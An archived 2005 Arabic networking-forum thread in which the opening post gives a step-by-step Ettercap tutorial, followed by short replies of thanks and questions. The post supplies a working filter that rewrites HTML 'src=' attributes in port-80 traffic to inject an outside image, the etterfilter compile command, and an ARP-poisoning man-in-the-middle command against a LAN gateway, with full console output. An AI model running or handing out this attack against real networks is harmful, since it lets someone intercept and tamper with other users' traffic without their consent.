الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

Play with Ettercap filters

بدأه Qnix في 4 يوليو 2005 · 3 رد · 2,024 مشاهدة · في منتدى الشبكات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

السلام عليكم ورحمه الله وبركاته

نبذه عن Ettercap :-

هذه الاداه هي اداه لعمل هجوم man in the middle على شبكه ال LAN ويعمل ايضا على انه Sniff على شبكه شغاله ( live ) ويتمتع بأنه يقبل بعض ال filters الخاصه فيه لعمل خواص قد تقوم انت بأضافتها او قد تجدها جاهزه في الانترنت ...

موقع البرنامج : http://ettercap.sf.net

------------------------------------------------------------------------------------------------------------

اليوم سوف نقوم بأنشاء Filter يقوم بعمليه جميله على الشبكه وهذا هو الفلتر

 
if (ip.proto == TCP && tcp.src == 80) {
   replace("src=", "src=\"http://www.anything.com/fun.png\" ");
   replace("SRC=", "src=\"http://www.anything.com/fun.png\" ");
   msg("Filter Ran.\n");
}

هاذا السكربت سوف يقوم بلنظر الى بروتوكول TCP وخاصه في البورت رقم 80 وتغيير طلبات التي تعبر عن طريق ال switch او عن طريق شبكه بردج .. ومال الى ذالك فيغير الطلب src= الى الطلب الذي وضعناه نحن ... فهاذا سيسبب في تغيير اي شئ يستعمل ال src= في طلباته الى شئ قريب من هاذا

<img src="http://www.anything.com/fun.png">

وسوف تضهر للمستخدمين على الشبكه هذه الصوره

fun.png

فلنبدء بتوضيح طريقه العمل ... في البدايه قم بانشاء ملف للفلتر واكتب فيه السورس كود ..

ولنفرض انه fun.filter ومن ثم نقوم بتشغيل الكومبايلر الخاص ب ettercap ونعمل ملف باينري

  

root@Qnix:~/fun-with-ettercap# etterfilter fun.filter -o fun

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


 12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

 11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

 Parsing source file 'fun.filter'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'fun'  done.

 -> Script encoded into 8 instructions

الاّن قمنا بأنشاء filter جاهز للعمل واسمه fun ... نقوم بتشغيله وتشغيل برنامج ettercap والعمل على

تطبيق هاذا الفلتر على الشبكه التي توجد في المنزل ..

 
root@Qnix:~/fun-with-ettercap# ettercap -T -q -F fun -M ARP /192.168.0.1/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from fun...
Listening on eth0... (Ethernet)

  eth0 ->       00:0B:CD:7B:00:AA      192.168.0.81     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

29 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing *** hosts for scanning...
Scanning the whole netmask for *** hosts...
* |==================================================>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.0.1 00:04:56:B8:70:AD

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Filter Ran.
Filter Ran.

كما ترون قد استعملنا الامر ettercap -T -q -F fun -M ARP /192.168.0.1/ //

-T = لاستعمال ال text mode لكي يعنل عن طريق ال console

-q = وهو لعرض الاشياء المهمه فقط

-F= لأضافه فلتر جديد وقد اضفنا fun

-M = لتشغيل هجوم MITM ( رجل في المنتصف )

ARP = النوع المتختار للباكتس ( الهجوم )

// // = هنا تحدد الايبيات واذا وضعت فقط // // فسوف يقوم بلبحث في المجال كله ( netmask )

وها قد قمنا بانهاء العمل ... فعندما يقوم الجهاز الفلاني صاحب ال ip رقم 192.168.0.1 بلدخول الى موقع

او اي شئ ... سوف تضهر له صور كثيره من الموجوده في الأعلى ...

( كاتب السكربت : NaGa & ALoR )

تحياتي

تم تعديل هذه المشاركة بواسطة Qnix في 4 يوليو 2005 في 20:29

#2

الله عليك يا مان مقدرشي اقول غير كده حجرب الموضوع ده في الايزا 2004 لانه هجوم man in the middle تعبنا مع ال 2000 و مايكروسوفت وعدت بحل المشكلة في 2004 دلوقتي نشوف

Mahmoud Magdy

MVP - Exchange Server. MCITP (Windows Server 2008, Exhcange Server 2010,/2007),CCNP, MCTS(OCS 2007 R2, SCCM 2007)

Tech Lead

Ingazat Information Technology

Follow me on twitter: http://www.twitter.com/_busbar

my blog: http://autodiscover.wordpress.com

Link with me on linkedin: http://www.linkedin.com/profile?viewProfile=&key=71027694

or on experts-exchange.com: http://www.experts-exchange.com/M_1426100.html

#3

هل يوجد notes فى api لهذه الاداه

شكرا

Nothing Beat the Human Brain

موبايل 020104927122

#4

مشكور كثير اخي

لكن هل لي ان اعرف كيف نستطيع ان نعيد الجهاز

الى ما كان عليه وشكرا

مواضيع مشابهة